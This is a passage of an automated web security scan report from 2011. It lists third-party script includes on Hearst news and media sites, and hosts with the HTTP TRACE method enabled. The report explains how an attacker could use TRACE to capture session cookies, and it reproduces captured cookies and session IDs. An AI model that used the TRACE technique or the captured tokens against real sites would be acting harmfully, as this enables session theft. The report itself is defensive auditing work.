
Request

GET / HTTP/1.1
Host: www.quickandsimple.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=65
Date: Sat, 17 Sep 2011 16:33:28 GMT
Content-Length: 48433
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<!-- Audience Science script -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
19.68. http://www.seattlepi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 133999
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
<meta property="fb:admins" content="561063134,10708529,777888639,557785987,679329235,653226748,58963564,710213297,100001539234772,601331469"/>

<script type="text/javascript" id="adPositionManagerScriptTag" src="http://images.chron.com/apps/adWiz/loadAdWiz.js"></script>
...[SNIP]...
<div class="hst-ysm">
   <script type="text/javascript" src="http://images.chron.com/CDC/elf/js/ysmwrapper.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.zvents.com/javascripts/happy_partner_widgets.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518"></script>
...[SNIP]...
19.69. http://www.seattlepi.com/flashtalking/ftlocal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /flashtalking/ftlocal.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: btype=web; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; zvents_tracker_sid=13162946948850.7696152536664158; adx=c174511@1316381121@1; aDxT=0.39756556041538715; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:53:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 29368
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:58:06 GMT
x-cdn: Cotendo
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
...[SNIP]...
<meta property="fb:admins" content="561063134,10708529,777888639,557785987,679329235,653226748,58963564,710213297,100001539234772,601331469"/>

<script type="text/javascript" id="adPositionManagerScriptTag" src="http://images.chron.com/apps/adWiz/loadAdWiz.js"></script>
...[SNIP]...
<div class="hst-ysm">
   <script type="text/javascript" src="http://images.chron.com/CDC/elf/js/ysmwrapper.js"></script>
...[SNIP]...
19.70. http://www.seventeen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=68
Date: Sat, 17 Sep 2011 16:34:01 GMT
Content-Length: 103172
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cybuzz%2Cmixx%2Cfriendfeed&linkfg=%23006bb6&offsetLeft=-240;onmouseover=false"></script>
...[SNIP]...
</div>
                                   <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Audience Science script -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
19.71. http://www.stamfordadvocate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stamfordadvocate.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 146578
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
<meta property="fb:admins" content="653226748,58963564,710213297"/>

<script type="text/javascript" id="adPositionManagerScriptTag" src="http://images.chron.com/apps/adWiz/loadAdWiz.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ctextras.hearstdigitalnews.com/cmg/js/widgets/sundayExclusive.js"></script>
...[SNIP]...
<div class="hst-ysm">
   <script type="text/javascript" src="http://images.chron.com/CDC/elf/js/ysmwrapper.js"></script>
...[SNIP]...
<div id="mycapturecluster_in" style="display:none;"><script language="JavaScript" src="http://stamfordadvocate.mycapture.com/datafeeds/14525.js"></script>
...[SNIP]...
<!-- begin Zvents Widget -->
<script type="text/javascript" src="http://js.zvents.com/javascripts/happy_partner_widgets.js"></script>
...[SNIP]...
19.72. http://www.thedailygreen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=423
Date: Sat, 17 Sep 2011 16:26:50 GMT
Content-Length: 98795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<!-- homepage -->

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdigg%2Cstumbleupon%2Cdelicious%2Creddit%2Cmyspace%2Ctechnorati%2Cnewsvine%2Cmixx%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Clinkedin%2Cybuzz%2Cfriendfeed&amp;linkfg=%233d6666&amp;offsetLeft=-240;onmouseover=false"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<!-- Audience Science script -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
<!-- Tynt Tracer Beta -->
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=acOw60thSr3PRGab7jrHcU&s=70"></script>
...[SNIP]...
19.73. http://www.timesunion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesunion.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.timesunion.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/albany-times-union.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 151122
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
operty="fb:admins" content="12318284,771489839,589635640,100000018647482,582430764,551334080,529681987,100000343521475,100001073444821,710213297,653226748,100001539234772,601331469"/>

<script type="text/javascript" id="adPositionManagerScriptTag" src="http://images.chron.com/apps/adWiz/loadAdWiz.js"></script>
...[SNIP]...
<td>
<script type="text/javascript" src="http://studio-5.financialcontent.com/hearst?Account=timesunion&Module=markets&Output=JS"></script>
...[SNIP]...
<div class="hst-ysm">
   <script type="text/javascript" src="http://images.chron.com/CDC/elf/js/ysmwrapper.js"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://www.zvents.com/misc/widgets/20645.js?65617"></script>
...[SNIP]...
<td>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- Start of Brightcove Player -->
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<div id="mycapturecluster_in" style="display:none;">
<script language="JavaScript" src="http://timesunion.mycapture.com/datafeeds/13167.js"></script>
...[SNIP]...
19.74. http://www.ugo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:01 GMT
Server: Apache
Set-Cookie: cgi-session-id=02CA2604-E14A-11E0-BC3F-0EFE2AB523E0; path=/
Set-Cookie: cgi-session-id=02CA2604-E14A-11E0-BC3F-0EFE2AB523E0; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: text/html
Cache-Control: private
Content-Length: 61418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraph
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cm/ugo/css/ugo-global.css?nocache070611" />


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<script type="text/javascript" src="http://cdn.optimizely.com/js/7494051.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://scripts.verticalacuity.com/vat/mon/vt.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- AUDIENCESCIENCE AD TAG CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=C07583" type="text/javascript">
</script>
...[SNIP]...
<!-- Facebook Connect initialization -->    <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
19.75. http://www.ugo.com/cm/ugo/js/ugo-global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /cm/ugo/js/ugo-global.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cm/ugo/js/ugo-global.js?nocache062111 HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=87EABF5C-E149-11E0-A3B2-DE2D31DE560E

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:15 GMT
Server: Apache
Last-Modified: Thu, 04 Aug 2011 19:23:11 GMT
ETag: "1ab1706-4d31-4a9b2e95865c0"
Accept-Ranges: bytes
Content-Length: 19761
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cneonction: close
Content-Type: application/x-javascript

/* Global UGO Scripts */
$j(document).ready(function() {

   // awesome custom selector
   $j.expr[':'].parents = function(node,i,m) {    
       return $j(node).parents( m[3] ).length < 1;
   };

// s
...[SNIP]...
' );
   var old_dw = document.write;
   var old_dwl = document.writeln;

   document.write = ugo_make_writer( '#top-300x250' );
   document.writeln = ugo_make_writer( '#top-300x250' );

   var stag = '<script type="text/javascript" src="http://ad.doubleclick.net/adj/ugo.ugo.games/games-index;dev=true;pt=free-games;channel=games;;sz=300x250;pos=top;tile=3;ord=1">';

   $j( '#top-300x250' ).html( stag );

   */
}
19.76. http://www.ugo.com/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316294750531r0.9246824700385332; UGOwelcome=welcomeMat:1; __qca=P0-746893420-1316294814023; base_domain_6606a44d10f0b87a63e3258379b62940=ugo.com; cgi-session-id=3E84637A-E14B-11E0-8409-57FE2AB523E0; optimizelyBuckets=%7B%7D; __utma=240756231.584038807.1316294751.1316294751.1316294751.1; __utmb=240756231.3.10.1316294751; __utmc=240756231; __utmz=240756231.1316294751.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; _vaTC=uuid=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1316295484680; _vaHC=holdout=false; s_sess=%20s_cc%3Dtrue%3B; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:59 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: text/html
Cache-Control: private
Content-Length: 312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>xd</title></head><body><script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...
19.77. http://www.zvents.com/misc/widgets/20645.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /misc/widgets/20645.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /misc/widgets/20645.js?65617 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 56852
Date: Sat, 17 Sep 2011 00:35:45 GMT
Expires: Sat, 17 Sep 2011 04:35:45 GMT
Cache-Control: max-age=14400
Content-Length: 226756
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Server: nginx/0.6.39
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Aug 2011 01:09:25 GMT


zvents_save_jquery = {};

if (typeof jQuery != 'undefined') zvents_save_jquery.jQuery = jQuery;
if (typeof $ != 'undefined') zvents_save_jquery.$ = $;
/*!
* jQuery JavaScript Library v1.4.2
* http:
...[SNIP]...
</script>',
'<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
20. TRACE method is enabled  previous  next
There are 62 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://1663.ic-live.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1663.ic-live.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 1663.ic-live.com
Cookie: 420eca3f11a717da

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:37:12 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from i2a-coll-1
X-Cache-Lookup: NONE from i2a-coll-1:80
Via: 1.0 i2a-coll-1:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: 1663.ic-live.com
Cookie: 420eca3f11a717da; cvt586=106159628; ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; cvt522=33083100; sid1663=1316276715uO4fF6qR5mM0
Via: 1.0 i2a-coll-1:80 (squid/2.6.STABLE21)
X-Forwarded-For: 5
...[SNIP]...
20.2. http://33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 33across.com
Cookie: bc9858af044e1c80

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 33across.com
Cookie: bc9858af044e1c80; 33x_nc=33Across+Optout; 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C

20.3. http://advertising.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: d896eeb9ae35f2ec

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: d896eeb9ae35f2ec; s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4
Conne
...[SNIP]...
20.4. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: afe.specificclick.net
Cookie: df460aeab8e8e908

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 130
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close

TRACE / HTTP/1.0
host: afe.specificclick.net
cookie: df460aeab8e8e908; JSESSIONID=8335ff53b00524f964d967e96250; ADVIVA=NOTRACK
20.5. http://amch.questionmarket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6f40f3cfc462f6ab

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:28 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6f40f3cfc462f6ab; linkjumptest=1; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6
...[SNIP]...
20.6. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 138deac64b930631

Response

HTTP/1.1 200 OK
Server: GlassFish v3
Content-Type: message/http
Content-Length: 460
Date: Sat, 17 Sep 2011 16:31:13 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 138deac64b930631; C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%
...[SNIP]...
20.7. http://cache.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: a09c17ec56332bf2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:54 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n30 ( origin>CONN)
Content-Length: 347
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
host: ads.specificmedia.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
via: 1.1 lax-agg-n30.panthercdn.com PWS/1.7.3.3
x-forwarded-for: 50.23.123.106, 66.114.50.13
x-forwarded-ip: 50.23.123.106
x-initial-url: http://cache.specificmedia.com/
cookie: a09c17ec56332bf2; ADVIVA=NOTRACK
connection: keep-alive
20.8. http://domdex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: domdex.com
Cookie: 74fdea154365b868

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:03 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: domdex.com
Cookie: 74fdea154365b868; optout=1
